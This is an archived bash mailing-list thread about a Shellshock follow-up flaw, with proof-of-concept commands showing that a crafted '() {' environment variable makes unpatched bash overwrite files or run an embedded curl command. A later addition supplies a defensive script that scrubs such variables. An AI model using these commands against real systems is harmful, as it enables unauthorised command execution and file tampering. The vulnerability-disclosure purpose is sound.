Re: Bash-4.3 Official Patch 25


From: Wesley Hirsch
Subject: Re: Bash-4.3 Official Patch 25
Date: Wed, 24 Sep 2014 18:50:37 -0400

Also, you can embed arguments, allowing for arbitrary execution:

$ env -i  X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
                      "http://www.w3.org/TR/html4/loose.dtd";>
<html lang="en">
  <head>
    <title>Red Hat Bugzilla Main Page</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="verify-v1"
content="1hLjVPyIYh2cX7CL+s5A0k6pKt2FRq7/FSQ/cqGi9J8=">
    <meta name="y_key" content="1cdf458efae704ba">

      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

On Wed, Sep 24, 2014 at 6:44 PM, Ángel González <angel@16bits.net> wrote:

> Eric Blake wrote:
> > https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> > (aka CVE-2014-6271), and points out that even _with_ this patch, there
> > is still a flaw that attackers can use to overwrite portions of the
> > filesystem, which is also a possible exploitation avenue:
> >
> > $ ls -l date
> > ls: cannot access date: No such file or directory
> > $ env -i  X='() { (a)=>\' bash -c 'date'
> > bash: X: line 1: syntax error near unexpected token `='
> > bash: X: line 1: `'
> > bash: error importing function definition for `X'
> > $ ls -l date
> > -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
>
> It doesn't just create 0-sized files:
>
> $ echo "{ echo 'Hello World' }" > foo.sh
>
> $ VAR='() { (a) =>\' bash foo.sh
> bash: VAR: line 1: syntax error near unexpected token `='
> bash: VAR: line 1: `'
> bash: error importing function definition for `VAR'
>
> $ cat {
> Hello World }
>
>
> OTOH, had we used bash -c foo.sh, it would have removed the script
> contents (truncated to 0 bytes).
>
>
>
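Added example, not part of the original messages: both sessions above rely on bash trying to import a function from an environment value that begins with `() {`, so a stopgap for an unpatched host is to drop such variables before a shell starts. The function names `funcdef_vars` and `run_scrubbed` are made up for this sketch, and `env -u` is assumed to be available (GNU coreutils, BSD, BusyBox).

```shell
#!/bin/sh
# Added sketch: find and strip environment variables that an affected bash
# would try to import as function definitions.

# Print the name of every environment variable whose value starts with "() {".
# awk's ENVIRON array is used instead of parsing `env` output so that values
# containing newlines cannot be mistaken for separate NAME=value lines.
# Note: function exports written by later bash releases (BASH_FUNC_name%%)
# also match, because their values start the same way.
funcdef_vars() {
    awk 'BEGIN {
        for (k in ENVIRON)
            if (index(ENVIRON[k], "() {") == 1)
                print k
    }'
}

# Run a command with every such variable removed from its environment.
# The body is a subshell, so the caller's own environment is left untouched.
run_scrubbed() (
    set -f                          # no globbing while splitting the name list
    for name in $(funcdef_vars); do
        set -- -u "$name" "$@"      # prepend "-u NAME" for env
    done
    exec env "$@"
)

# Usage (hypothetical script path):
#   run_scrubbed bash /path/to/script.sh
```

This only narrows exposure for processes launched through the wrapper; it does not fix the parser, so it is no substitute for installing the corrected bash.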